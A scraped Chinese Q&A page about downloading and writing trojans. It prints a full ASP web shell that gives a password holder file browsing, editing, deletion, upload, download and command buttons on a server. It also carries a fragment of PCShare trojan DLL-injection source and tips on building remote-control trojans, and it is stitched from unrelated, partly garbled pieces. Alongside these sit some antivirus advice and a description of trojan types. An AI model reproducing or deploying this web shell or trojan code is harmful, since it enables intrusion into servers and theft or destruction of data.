木马程序包_木马程序代码下载

hacker|
225

怎样下载木马程序

你好

不要自己随意下载这个东西

伤人伤己在你下载的时候自己的软件也会受到威胁

有好多软件都带有恶意插件

一不小心就会泄漏你的个人隐私

要是还没有相应的安全管理软件

就安装腾讯手机管家吧

进入安全防护---病毒查杀

能齐全,并且与卡巴斯基合作提供双核引擎杀毒

它自动更新病毒数据库,让你放心安全的查杀所有病毒

不用担心新型病毒的危害

全面的查杀病du程序和恶意插件,同时彻底清除缓存文件

画面干净简洁,操作简单也很人性化

希望可以帮到你,望采纳!

木马程序源码

一个asp木马:

<%@ LANGUAGE = VBScript.Encode codepage ="936" %>

<%Server.ScriptTimeOut=5000%>

<object runat=server id=oScript scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>

<object runat=server id=oScriptNet scope=page classid="clsid:093FF999-1EA0-4079-9525-9614C3504B74"></object>

<object runat=server id=oFileSys scope=page classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></object>

<%

'on error resume next

dim Data_5xsoft

Class upload_5xsoft

dim objForm,objFile,Version

Public function Form(strForm)

strForm=lcase(strForm)

if not objForm.exists(strForm) then

Form=""

else

Form=objForm(strForm)

end if

end function

Public function File(strFile)

strFile=lcase(strFile)

if not objFile.exists(strFile) then

set File=new FileInfo

else

set File=objFile(strFile)

end if

end function

Private Sub Class_Initialize

dim RequestData,sStart,vbCrlf,sInfo,iInfoStart,iInfoEnd,tStream,iStart,theFile

dim iFileSize,sFilePath,sFileType,sFormValue,sFileName

dim iFindStart,iFindEnd

dim iFormStart,iFormEnd,sFormName

Version="HTTP上传程序 Version 2.0"

set objForm=Server.CreateObject("Scripting.Dictionary")

set objFile=Server.CreateObject("Scripting.Dictionary")

if Request.TotalBytes<1 then Exit Sub

set tStream = Server.CreateObject("adodb.stream")

set Data_5xsoft = Server.CreateObject("adodb.stream")

Data_5xsoft.Type = 1

Data_5xsoft.Mode =3

Data_5xsoft.Open

Data_5xsoft.Write Request.BinaryRead(Request.TotalBytes)

Data_5xsoft.Position=0

RequestData =Data_5xsoft.Read

iFormStart = 1

iFormEnd = LenB(RequestData)

vbCrlf = chrB(13) chrB(10)

sStart = MidB(RequestData,1, InStrB(iFormStart,RequestData,vbCrlf)-1)

iStart = LenB (sStart)

iFormStart=iFormStart+iStart+1

while (iFormStart + 10) < iFormEnd

iInfoEnd = InStrB(iFormStart,RequestData,vbCrlf vbCrlf)+3

tStream.Type = 1

tStream.Mode =3

tStream.Open

Data_5xsoft.Position = iFormStart

Data_5xsoft.CopyTo tStream,iInfoEnd-iFormStart

tStream.Position = 0

tStream.Type = 2

tStream.Charset ="gb2312"

sInfo = tStream.ReadText

tStream.Close

iFormStart = InStrB(iInfoEnd,RequestData,sStart)

iFindStart = InStr(22,sInfo,"name=""",1)+6

iFindEnd = InStr(iFindStart,sInfo,"""",1)

sFormName = lcase(Mid (sinfo,iFindStart,iFindEnd-iFindStart))

if InStr (45,sInfo,"filename=""",1) > 0 then

set theFile=new FileInfo

iFindStart = InStr(iFindEnd,sInfo,"filename=""",1)+10

iFindEnd = InStr(iFindStart,sInfo,"""",1)

sFileName = Mid (sinfo,iFindStart,iFindEnd-iFindStart)

theFile.FileName=getFileName(sFileName)

theFile.FilePath=getFilePath(sFileName)

iFindStart = InStr(iFindEnd,sInfo,"Content-Type: ",1)+14

iFindEnd = InStr(iFindStart,sInfo,vbCr)

theFile.FileType =Mid (sinfo,iFindStart,iFindEnd-iFindStart)

theFile.FileStart =iInfoEnd

theFile.FileSize = iFormStart -iInfoEnd -3

theFile.FormName=sFormName

if not objFile.Exists(sFormName) then

objFile.add sFormName,theFile

end if

else

tStream.Type =1

tStream.Mode =3

tStream.Open

Data_5xsoft.Position = iInfoEnd

Data_5xsoft.CopyTo tStream,iFormStart-iInfoEnd-3

tStream.Position = 0

tStream.Type = 2

tStream.Charset ="gb2312"

sFormValue = tStream.ReadText

tStream.Close

if objForm.Exists(sFormName) then

objForm(sFormName)=objForm(sFormName)", "sFormValue

else

objForm.Add sFormName,sFormValue

end if

end if

iFormStart=iFormStart+iStart+1

wend

RequestData=""

set tStream =nothing

End Sub

Private Sub Class_Terminate

if Request.TotalBytes>0 then

objForm.RemoveAll

objFile.RemoveAll

set objForm=nothing

set objFile=nothing

Data_5xsoft.Close

set Data_5xsoft =nothing

end if

End Sub

Private function GetFilePath(FullPath)

If FullPath <> "" Then

GetFilePath = left(FullPath,InStrRev(FullPath, "\"))

Else

GetFilePath = ""

End If

End function

Private function GetFileName(FullPath)

If FullPath <> "" Then

GetFileName = mid(FullPath,InStrRev(FullPath, "\")+1)

Else

GetFileName = ""

End If

End function

End Class

Class FileInfo

dim FormName,FileName,FilePath,FileSize,FileType,FileStart

Private Sub Class_Initialize

FileName = ""

FilePath = ""

FileSize = 0

FileStart= 0

FormName = ""

FileType = ""

End Sub

Public function SaveAs(FullPath)

dim dr,ErrorChar,i

SaveAs=true

if trim(fullpath)="" or FileStart=0 or FileName="" or right(fullpath,1)="/" then exit function

set dr=CreateObject("Adodb.Stream")

dr.Mode=3

dr.Type=1

dr.Open

Data_5xsoft.position=FileStart

Data_5xsoft.copyto dr,FileSize

dr.SaveToFile FullPath,2

dr.Close

set dr=nothing

SaveAs=false

end function

End Class

httpt = Request.ServerVariables("server_name")

rseb=Request.ServerVariables("SCRIPT_NAME")

q=request("q")

if q="" then q=rseb

select case q

case rseb

if Epass(trim(request.form("password")))="q_ux888556" then

response.cookies("password")="7758521"

response.redirect rseb "?q=list.asp"

else %>

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=gb2312">

<title><%=httpt%></title>

<meta name="GENERATOR" content="Microsoft FrontPage 3.0">

</head>

<body>

<%if request.form("password")<>"" then

response.write "Password Error!"

end if

%>

<table border="1" width="100%" height="89" bgcolor="#DFDFFF" cellpadding="3"

bordercolorlight="#000000" bordercolordark="#F2F2F9" cellspacing="0">

<tr>

<td width="100%" height="31" bgcolor="#000080"><p align="center"><font color="#FFFFFF"><%=httpt%></font></td>

</tr>

<tr>

<td width="100%" height="46"><form method="POST" action="<%=rseb%>?q=<%=rseb%>">

<div align="center"><center><p>Enter Password:<input type="password" name="password"

size="20"

style="border-left: thin none; border-right: thin none; border-top: thin outset; border-bottom: thin outset">

<input type="submit" value="OK!LOGIN" name="B1"

style="font-size: 9pt; border: thin outset"></p>

</center></div>

</form>

</td>

</tr>

</table>

</body>

</html>

<%end if%>

<%case "down.asp"

call downloadFile(request("path"))

function downloadFile(strFile)

strFilename = strFile

Response.Buffer = True

Response.Clear

set s = Server.CreateObject("adodb.stream")

s.Open

s.Type = 1

if not oFileSys.FileExists(strFilename) then

Response.Write("<h1>Error:</h1>" strFilename " does not exist<p>")

Response.End

end if

Set f = oFileSys.GetFile(strFilename)

intFilelength = f.size

s.LoadFromFile(strFilename)

if err then

Response.Write("<h1>Error: </h1>" err.Description "<p>")

Response.End

end if

Response.AddHeader "Content-Disposition", "attachment; filename=" f.name

Response.AddHeader "Content-Length", intFilelength

Response.CharSet = "UTF-8"

Response.ContentType = "application/octet-stream"

Response.BinaryWrite s.Read

Response.Flush

s.Close

Set s = Nothing

response.end

End Function

%>

<%case "list.asp"%>

<%

urlpath=server.urlencode(path)

if Request.Cookies("password")="7758521" then

dim cpath,lpath

if Request("path")="" then

lpath="/"

else

lpath=Request("path")"/"

end if

if Request("attrib")="true" then

cpath=lpath

attrib="true"

else

cpath=Server.MapPath(lpath)

attrib=""

end if

Sub GetFolder()

dim theFolder,theSubFolders

if oFileSys.FolderExists(cpath)then

Set theFolder=oFileSys.GetFolder(cpath)

Set theSubFolders=theFolder.SubFolders

Response.write"<a href='" rseb "?q=list.asppath="Request("oldpath")"attrib="attrib"'><font color='#FF8000'>■</font>↑<font color='ff2222'>回上级目录</font></a><br><script language=vbscript>"

For Each x In theSubFolders

%>so "<%=lpath%>","<%=x.Name%>","<%=request("path")%>","<%=attrib%>"

<%

Next

%></script><%

end if

End Sub

Sub GetFile()

dim theFiles

if oFileSys.FolderExists(cpath)then

Set theFolder=oFileSys.GetFolder(cpath)

Set theFiles=theFolder.Files

Response.write"<table border='0' width='100%' cellpadding='0'><script language=vbscript>"

For Each x In theFiles

if Request("attrib")="true" then

showstring=x.Name

else

showstring=x.Name

end if

%>sf "<%=showstring%>","<%=x.size%>","<%=x.type%>","<%=x.Attributes%>","<%=x.DateLastModified%>","<%=lpath%>","<%=x.name%>","<%=attrib%>","<%=x.name%>"

<%

Next

end if

Response.write"</script></table>"

End Sub

%>

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=gb2312">

<title><%=httpt%></title>

<style type="text/css">

<!--

table{ font-family: 宋体; font-size: 9pt }

a{ font-family: 宋体; font-size: 9pt; color: rgb(0,32,64); text-decoration: none }

a:hover{ font-family: 宋体; color: rgb(255,0,0); text-decoration: none }

a:visited{ color: rgb(128,0,0) }

td { font-size: 9pt}

a { color: #000000; text-decoration: none}

a:hover { text-decoration: underline}

.tx { height: 16px; width: 30px; border-color: black black #000000; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 1px; border-left-width: 0px; font-size: 9pt; background-color: #eeeeee; color: #0000FF}

.bt { font-size: 9pt; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; height: 16px; width: 80px; background-color: #eeeeee; cursor: hand}

.tx1 { height: 18px; width: 60px; font-size: 9pt; border: 1px solid; border-color: black black #000000; color: #0000FF}

-->

</style>

</head>

<script language="JavaScript">

function crfile(ls)

{if (ls==""){alert("请输入文件名!");}

else {window.open("<%=rseb%>?q=edit.aspattrib=<%=request("attrib")%>creat=yespath=<%=lpath%>"+ls);}

return false;

}

function crdir(ls)

{if (ls==""){alert("请输入文件名!");}

else {window.open("<%=rseb%>?q=edir.aspattrib=<%=request("attrib")%>op=creatpath=<%=lpath%>"+ls);}

return false;

}

</script>

<script language="vbscript">

sub sf(showstring,size,type1,Attributes,DateLastModified,lpath,xname,attrib,name)

document.write "<tr style=""color: #000000; background-color: #FFefdf; text-decoration: blink; border: 1px solid #000080"" onMouseOver=""this.style.backgroundColor = '#FFCC00'"" onMouseOut=""this.style.backgroundColor = '#FFefdf'""><td width='50%'><font color='#FF8000'><font face=Wingdings>+</font></font><a href='" urlpath lpath xName "' target='_blank'><strong>" showstring "</strong></a></td><td width='20%' align='right'>" size "字节</td><td width='30%'><a href='#' title='类型:" type1 chr(10) "属性:" Attributes chr(10) "时间:" DateLastModified "'>属性</a> <a href='<%=rseb%>?q=edit.asppath=" lpath xName "attrib=" attrib "' target='_blank' ><font color='#FF8000' ></font>编辑</a> <a href="chr(34)"javascript: rmdir1('" lpath xName "')"chr(34)"><font color='#FF8000' ></font>删除</a> <a href='#' onclick=copyfile('" lpath Name "')><font color='#FF8000' ></font>复制</a> <a href='<%=rseb%>?q=down.asppath=<%=cpath%>\"xName"attrib=" attrib "' target='_blank' ><font color='#FF8000' ></font>下载</a></td></tr>"

end sub

sub so(lpath,xName,path,attrib)

document.write "<a href='<%=rseb%>?q=list.asppath=" lpath xName "oldpath=" path "attrib=" attrib "'>└<font color='#FF8000'><font face=Wingdings>1</font></font> " xName "</a> <a href="chr(34)"javascript: rmdir('" lpath xName "')"chr(34)"><font color='#FF8000' ></font>删除</a><br>"

end sub

sub rmdir1(ls)

if confirm("你真的要删除这个文件吗!"Chr(13)Chr(10)"文件为:"ls) then

window.open("<%=rseb%>?q=edit.asppath=" ls "op=delattrib=<%=request("attrib")%>")

end if

end sub

sub rmdir(ls)

if confirm("你真的要删除这个目录吗!"Chr(13)Chr(10)"目录为:"ls) then

window.open("<%=rseb%>?q=edir.asppath="ls"op=delattrib=<%=request("attrib")%>")

end if

end sub

sub copyfile(sfile)

dfile=InputBox("※文件复制※"Chr(13)Chr(10)"源文件:" sfileChr(13)Chr(10)"输入目标文件的文件名:"Chr(13)Chr(10) "[允许带路径,要根据你的当前路径模式]")

dfile=trim(dfile)

attrib="<%=request("attrib")%>"

if dfile<>"" then

if InStr(dfile,":") or InStr(dfile,"/")=1 then

lp=""

if InStr(dfile,":") and attrib<>"true" then

alert "对不起,你在相对路径模式下不能使用绝对路径"Chr(13)Chr(10)"错误路径:["dfile"]"

exit sub

end if

else

lp="<%=lpath%>"

end if

window.open("<%=rseb%>?q=edit.asppath="+sfile+"op=copyattrib="+attrib+"dpath="+lp+dfile)

else

alert"您没有输入文件名!"

end If

end sub

</script>

<body>

<table border="1" width="100%" cellpadding="0" height="81" bordercolorlight="#000000"

bordercolordark="#FFFFFF" cellspacing="0">

<tr>

<td width="755" bgcolor="#000080" colspan="2" height="23"><p align="center"><font size="3"

color="#FFFFFF"><%=httpt%></font></td>

</tr>

<tr>

<td width="751" bgcolor="#C0C0C0" colspan="2">※换盘:<span

style="background-color: rgb(255,255,255);color:rgb(255,0,0)"><%

For Each thing in oFileSys.Drives

Response.write "<font face=Wingdings>:</font><a href='" rseb "?q=list.asppath="thing.DriveLetter":attrib=true'>"thing.DriveLetter":</a>"

NEXT

%> </span> 地址:

<%= "\\" oScriptNet.ComputerName "\" oScriptNet.UserName %></td>

</tr>

<tr>

<td width="751" bgcolor="#C0C0C0" colspan="2">※<%

if Request("attrib")="true" then

response.write "<a href='" rseb "?q=list.asp'>切到相对路径</a>"

else

response.write "<a href='" rseb "?attrib=trueq=list.asp'>切到绝对路径</a>"

end if

%> ※绝对:<span

style="background-color: rgb(255,255,255)"><%=cpath%></span></td>

</tr>

<tr>

<td width="751" bgcolor="#C0C0C0" colspan="2">※当前<font color="#FF8000"><font face=Wingdings>1</font></font>:<span style="background-color: rgb(255,255,255)"><%=lpath%></span> </td>

</tr><form name="form1" method="post" action="<%=rseb%>?q=upfile.asp" target="_blank" enctype="multipart/form-data">

<tr><td bgcolor="#C0C0C0" colspan="2" style="height: 20px">

编辑|

<input class="a43c-a0ff-dc90-b3b2 tx1" type="text" name="filename" size="20">

<input class="a0ff-dc90-b3b2-fd94 tx1" type="button" value="建文" onclick="crfile(form1.filename.value)">

<input class="dc90-b3b2-fd94-577f tx1" type="button" value="建目" onclick="crdir(form1.filename.value)">

<input type="file" name="file1" class="b3b2-fd94-577f-a0d8 tx1" style="width:100" value="">

<input type="text" name="filepath" class="5b63-3de2-726b-2e30 tx1" style="width:100" value="<%=cpath%>">

<input type="hidden" name="act" value="upload">

<input type="hidden" name="upcount" class="3de2-726b-2e30-ab2e tx" value="1">

<input class="726b-2e30-ab2e-d73d tx1" type="submit" value="上传">

<input class="2e30-ab2e-d73d-311c tx1" type="button" onclick="window.open('<%=rseb%>?q=cmd.asp','_blank')" value="命令">

<input class="ab2e-d73d-311c-199d tx1" type="button" onclick="window.open('<%=rseb%>?q=test.asp','_blank')" value="配置">

<input class="d73d-311c-199d-31d3 tx1" type="button" onclick="window.open('<%=rseb%>?q=p.asp','_blank')" value="nfso">

</td>

</td>

</tr></form>

<tr>

<td width="169" valign="top" bgcolor="#C8E3FF"><%Call GetFolder()%>

</td>

<td width="582" valign="top" bgcolor="#FFefdf"><%Call GetFile()%>

</td>

</tr>

</table>

<%else

response.write "Password Error!"

response.write "<a href='" rseb "?q=" rseb "'>【返 回】</a>"

end if

%>

</body>

</html>

<%case "edit.asp"%>

<html>

<head>

<meta HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=gb_2312-80">

<title>编辑源代码</title>

<style>

<!--

table{ font-family: 宋体; font-size: 12pt }

a{ font-family: 宋体; font-size: 12pt; color: rgb(0,32,64); text-decoration: none }

a:hover{ font-family: 宋体; color: rgb(255,0,0); text-decoration: underline }

a:visited{ color: rgb(128,0,0) }

-->

</style>

</head>

<body>

<% '读文件

if Request.Cookies("password")="7758521" then

if request("op")="del" then

if Request("attrib")="true" then

whichfile=Request("path")

else

whichfile=server.mappath(Request("path"))

end if

Set thisfile = oFileSys.GetFile(whichfile)

thisfile.Delete True

Response.write "<script>alert('删除成功!要刷新才能看到效果');window.close();</script>"

else

if request("op")="copy" then

if Request("attrib")="true" then

whichfile=Request("path")

dsfile=Request("dpath")

else

whichfile=server.mappath(Request("path"))

dsfile=Server.MapPath(Request("dpath"))

end if

Set thisfile = oFileSys.GetFile(whichfile)

thisfile.copy dsfile

%>

<script language=vbscript>

msgbox "源文件:<%=whichfile%>" vbcrlf "目的文件:<%=dsfile%>" vbcrlf "复制成功!要刷新才能看到效果!"

window.close()

</script>

<%

else

if request.form("text")="" then

if Request("creat")<>"yes" then

if Request("attrib")="true" then

whichfile=Request("path")

else

whichfile=server.mappath(Request("path"))

end if

Set thisfile = oFileSys.OpenTextFile(whichfile, 1, False)

counter=0

thisline=thisfile.readall

thisfile.Close

set fs=nothing

end if

%>

<form method="POST" action="<%=rseb%>?q=edit.asp">

<input type="hidden" name="attrib" value="<%=Request("attrib")%>"><table border="0"

width="700" cellpadding="0">

<tr>

<td width="100%" bgcolor="#FFDBCA"><div align="center"><center><p><%=httpt%></td>

</tr>

<tr align="center">

<td width="100%" bgcolor="#FFDBCA">文件名:<input type="text" name="path" size="45"

value="<%=Request("path")%> ">直接更改文件名,相当于“另存为”</td>

</tr>

<tr align="center">

<td width="100%" bgcolor="#FFDBCA"><textarea rows="25" name="text" cols="90"><%=thisline%></textarea></td>

</tr>

<tr align="center">

<td width="100%" bgcolor="#FFDBCA"><div align="center"><center><p><input type="submit"

value="提交" name="B1"><input type="reset" value="复原" name="B2"></td>

</tr>

</table>

</form>

<%else

if Request("attrib")="true" then

whichfile=Request("path")

else

whichfile=server.mappath(Request("path"))

end if

Set outfile=oFileSys.CreateTextFile(whichfile)

outfile.WriteLine Request("text")

outfile.close

set fs=nothing

Response.write "<script>alert('修改成功!要刷新才能看到效果');window.close();</script>"

end if

end if

end if

else

response.write "Password Error!"

response.write "<a href='" rseb "?q=" rseb "'>【返 回】</a>"

end if

%>

</body>

</html>

<%case "edir.asp"%>

<html>

<head>

<meta HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=gb_2312-80">

<title>目录操作</title>

<style>

<!--

table{ font-family: 宋体; font-size: 12pt }

a{ font-family: 宋体; font-size: 12pt; color: rgb(0,32,64); text-decoration: none }

a:hover{ font-family: 宋体; color: rgb(255,0,0); text-decoration: underline }

a:visited{ color: rgb(128,0,0) }

-->

</style>

</head>

<body>

<% '读文件

if Request.Cookies("password")="7758521" then

if request("op")="del" then

if Request("attrib")="true" then

whichdir=Request("path")

else

whichdir=server.mappath(Request("path"))

end if

oFileSys.DeleteFolder whichdir,True

Response.write "<script>alert('删除的目录为:" whichdir "删除成功!要刷新才能看到效果');window.close();</script>"

else

if request("op")="creat" then

if Request("attrib")="true" then

whichdir=Request("path")

else

whichdir=server.mappath(Request("path"))

end if

oFileSys.CreateFolder whichdir

Response.write "<script>alert('建立的目录为:" whichdir "建立成功!要刷新才能看到效果');window.close();</script>"

end if

end if

else

response.write "Password Error!"

response.write "<a href='" rseb "?q=" rseb "'>【返 回】</a>"

end if

%>

</body>

</html>

<%

case "upfile.asp"

if Request.Cookies("password")="7758521" then

set upload=new upload_5xSoft

if upload.form("filepath")="" then

HtmEnd "请输入要上传至的目录!"

set upload=nothing

response.end

else

formPath=upload.form("filepath")

if right(formPath,1)<>"/" then formPath=formPath"/"

end if

iCount=0

for each formName in upload.objForm

set file=upload.file(formName)

if file.FileSize>

木马程序 Backdoor.Win32.IRCBot.dma 文件: D:\下载\MHXY-1.5.139.exe//file013

我来说说我的经过

事件经过:

1.在梦幻官网上使用迅雷下载梦幻客户端

2.完成后首先使用卡巴检测发现有木马

3.上网搜索,有人说官网上下的没问题,是卡巴的误报,关闭卡巴后再装就行了;也有人说迅雷下的东西为网友上传,可能确实有问题。

4.检验客户端程序的MD5码,发现与官网上给的不同,证明程序极有可能被修改替换过

5.未用迅雷重新在官网上采用普通方式又下载了一个客户端

6.检验新下客户端程序的MD5码,与官网上所给的一样

7.用卡巴检测新下的客户端,未发现任何威胁

结论:迅雷下的东西也不一定有保证,大家还是多长个心眼的好

木马我查过了,是灰鸽子

怎么做木马?

问题一:怎么 *** 木马程序? 你需要学会编程才能编写木马编写木马更好用vc++。enet/eschool/video/c++/ 这是c++的教程,你学懂了这些皮毛的东西再深入研究内核编程吧如果上面的地址打不开可以到这里pconline/pcedu/empolder/gj/vc/0607/820674

问题二:木马和病毒是怎么做出来的呢? 哈哈...木马和病毒都属于执行程序...

木马(Trojan)这个名字来源于古希腊传说(荷马史诗中木马计的故事,Trojan一词的本意是特洛伊的,即代指特洛伊木马,也就是木马计的故事)。

“木马”程序是目前比较流行的病毒文件,与一般的病毒不同,它不会自我繁殖,也并不“刻意”地去感染其他文件,它通过将自身伪装吸引用户下载执行,向施种木马者提供打开被种者电脑的门户,使施种者可以任意毁坏、窃取被种者的文件,甚至远程操控被种者的电脑。“木马”与计算机 *** 中常常要用到的远程控制软件有些相似,但由于远程控制软件是“善意”的控制,因此通常不具有隐蔽性;“木马”则完全相反,木马要达到的是“偷窃”性的远程控制,如果没有很强的隐蔽性的话,那就是“毫无价值”的。

它是指通过一段特定的程序(木马程序)来控制另一台计算机。木马通常有两个可执行程序:一个是客户端,即控制端,另一个是服务端,即被控制端。植入被种者电脑的是“服务器”部分,而所谓的“黑客”正是利用“控制器”进入运行了“服务器”的电脑。运行了木马程序的“服务器”以后,被种者的电脑就会有一个或几个端口被打开,使黑客可以利用这些打开的端口进入电脑系统,安全和个人隐私也就全无保障了! 木马的设计者为了防止木马被发现,而采用多种手段隐藏木马。木马的服务一旦运行并被控制端连接,其控制端将享有服务端的大部分操作权限,例如给计算机增加口令,浏览、移动、复制、删除文件,修改注册表,更改计算机配置等。

随着病毒编写技术的发展,木马程序对用户的威胁越来越大,尤其是一些木马程序采用了极其狡猾的手段来隐蔽自己,使普通用户很难在中毒后发觉。

木马得种类

1. *** 游戏木马

随着 *** 在线游戏的普及和升温,我国拥有规模庞大的网游玩家。 *** 游戏中的金钱、装备等虚拟财富与现实财富之间的界限越来越模糊。与此同时,以盗取网游帐号密码为目的的木马病毒也随之发展泛滥起来。

*** 游戏木马通常采用记录用户键盘输入、Hook游戏进程API函数等 *** 获取用户的密码和帐号。窃取到的信息一般通过发送电子邮件或向远程脚本程序提交的方式发送给木马作者。

*** 游戏木马的种类和数量,在国产木马病毒中都首屈一指。流行的 *** 游戏无一不受网游木马的威胁。一款新游戏正式发布后,往往在一到两个星期内,就会有相应的木马程序被 *** 出来。大量的木马生成器和黑客网站的公开销售也是网游木马泛滥的原因之一。

2. 网银木马

网银木马是针对网上交易系统编写的木马病毒,其目的是盗取用户的卡号、密码,甚至安全证书。此类木马种类数量虽然比不上网游木马,但它的危害更加直接,受害用户的损失更加惨重。

网银木马通常针对性较强,木马作者可能首先对某银行的网上交易系统进行仔细分析,然后针对安全薄弱环节编写病毒程序。如2004年的“网银大盗”病毒,在用户进入工行网银登录页面时,会自动把页面换成安全性能较差、但依然能够运转的老版页面,然后记录用户在此页面上填写的卡号和密码;“网银大盗3”利用招行网银专业版的备份安全证书功能,可以盗取安全证书;2005年的“新网银大盗”,采用API Hook等技术干扰网银登录安全控件的运行。

随着我国网上交易的普及,受到外来网银木马威胁的用户也在不断增加。

3. 即时通讯软件木马

现在,国内即时通讯软件百花齐放。 *** 、新浪UC、网易泡泡、盛大圈圈……网上聊天的用户群十分庞大。常见的即时通讯类木马一般有3种:

一、发送消息型。通过即时通讯软件自动发送含有恶意网址的消息,目的在于让收到消息的用户......

问题三:怎么 *** 简单木马? 一个简单的vc++6.0下的木马源码 木马源程序,包括客户端和服务端PCSshare的客户端代码:

#include stdafx.h

#include SshWork.h

#pragma data_seg(Shared)

char m_CharFileName[256] = {0};

HHOOK g_hook = NULL;

HHOOK g_khook = NULL;

INITDLLINFO m_InitInfo = {0};

BOOL m_IsOk = FALSE;

#pragma data_seg()

#pragma ment(linker,/section:Shared,rws)

HINSTANCE ghInstance = NULL;

SshWork m_Work;

BOOL APIENTRY DllMain( HANDLE hModule,

DWORD ul_reason_for_call,

LPVOID lpReserved

)

{

switch (ul_reason_for_call)

{

case DLL_THREAD_ATTACH:

case DLL_THREAD_DETACH:

case DLL_PROCESS_DETACH:

break;

case DLL_PROCESS_ATTACH:

ghInstance = (HINSTANCE) hModule;

break;

default : break;

}

return TRUE;

}

LRESULT WINAPI GetMsgProc(int nCode, WPARAM wParam, LPARAM lParam)

{

LRESULT lResult = CallNextHookEx(g_hook, nCode, wParam, lParam);

查看是否为指定进程

if(!m_IsOk m_InitInfo.m_ProcessId == GetCurrentProcessId())

{

找到指定进程取消hook

m_IsOk = TRUE;

if(g_hook) UnhookWindowsHookEx(g_hook);

通知主进程退出

HANDLE m_WaitEvent =

OpenEvent(EVENT_ALL_ACCESS,FALSE,

m_InitInfo.m_EventName);

if(m_WaitEvent)

{

SetEvent(m_WaitEvent);

CloseHandle(m_WaitEvent);

}

Sleep(1000);

装载DLL到进程

m_Work.m_Module = LoadLibrary(m_InitInfo.m_StartFile);

if(m_Work.m_Module)

{

m_Work.StartWork(m_InitInfo);

}

}

return lResult;

}

BOOL PlayWork(LPINIT......

问题四:木马病毒怎样 *** 上网先学学把,别自己先中毒了,网上就有代码下载的

问题五:怎么 *** 木马病毒 5分 这是个比较复杂的问题,病毒开发不同于普通应用开发,需要更广泛的和更深入的编成技术 系统底层问题:截取屏幕、Hook鼠标键盘 *** 问题:涉及到拦截数据报文,加解密数据 反侦测问题:隐藏进程…………学编程2~3个月,用Delphi之类的软件,一般就可以开发普通应用程序 VC++最多6个月,也能搞出些东西 但要搞病毒木马等,先学3年再考虑。

问题六:怎么做木马? 木马是内行的 但是你做木马 不要涉及财物之类的

盗取财物就涉及违法了

一般木马中毒都是通过下载软件,浏览未知网页

Trojan一词的特洛伊木马本意是特洛伊的,指特洛伊木马,是木马计的故事

木马会盗取你的账号,信息等资料

如果电脑中了木马建议尽快杀毒以免造成系统问题

可以先做一次全盘杀毒

然后针对性的:

腾讯电脑管家--工具箱--木马克星 (针对于杀了又出现的顽固病毒)

最后开启实时防毒保护。

问题七:怎么 *** 简单的木马程序 您好

1, *** 木马和使用木马病毒都是违法犯罪的行为,不建议您去学习。

2, *** 出木马病毒程序后,这个程序就会自动开始执行,对您的电脑首先开始盗取帐号木马以及破坏程序。

3,所以如果自己受到了攻击或者盗号,不要用这种方式,要以正当途径来解决。

4,建议您到腾讯电脑管家官网下载一个电脑管家。

5,电脑管家拥有16层实时防护功能和 *** 帐号全景防御系统,可以从上网安全、应用入口、系统底层等全方位保护电脑安全不受木马病毒侵袭,而且电脑管家还可以全方位多维度保护账号安全,精确打击盗号木马,瞬时查杀并对风险预警。

如果还有其他疑问和问题,欢迎再次来电脑管家企业平台进行提问,我们将尽全力为您解答疑难

问题八:如何做远程控制的木马? 配置一个动态域名,然后设置客户端,通过漏洞发送,进行远程控制,建议你看看动画教程,以前的灰鸽子什么的是个经典,先把那个研究透了什么都会了

0条大神的评论

发表评论